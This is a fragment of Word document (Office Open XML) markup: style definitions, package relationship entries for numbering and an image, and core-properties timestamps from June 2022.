  <w:style w:styleId="0qxvyo" w:default="true" w:type="character">
    <w:name w:val="Default Paragraph Font"/>
    <w:basedOn w:val=""/>
    <w:next w:val=""/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden w:val="true"/>
    <w:unhideWhenUsed w:val="true"/>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h04ypp" w:type="paragraph">
    <w:name w:val="melo-codeblock-Normal-theme-para"/>
    <w:basedOn w:val="oth9xn"/>
    <w:next w:val=""/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"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2022-06-21T09:19:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-21T09:19:26Z</dcterms:modified>
</cp:coreProperties>
</file>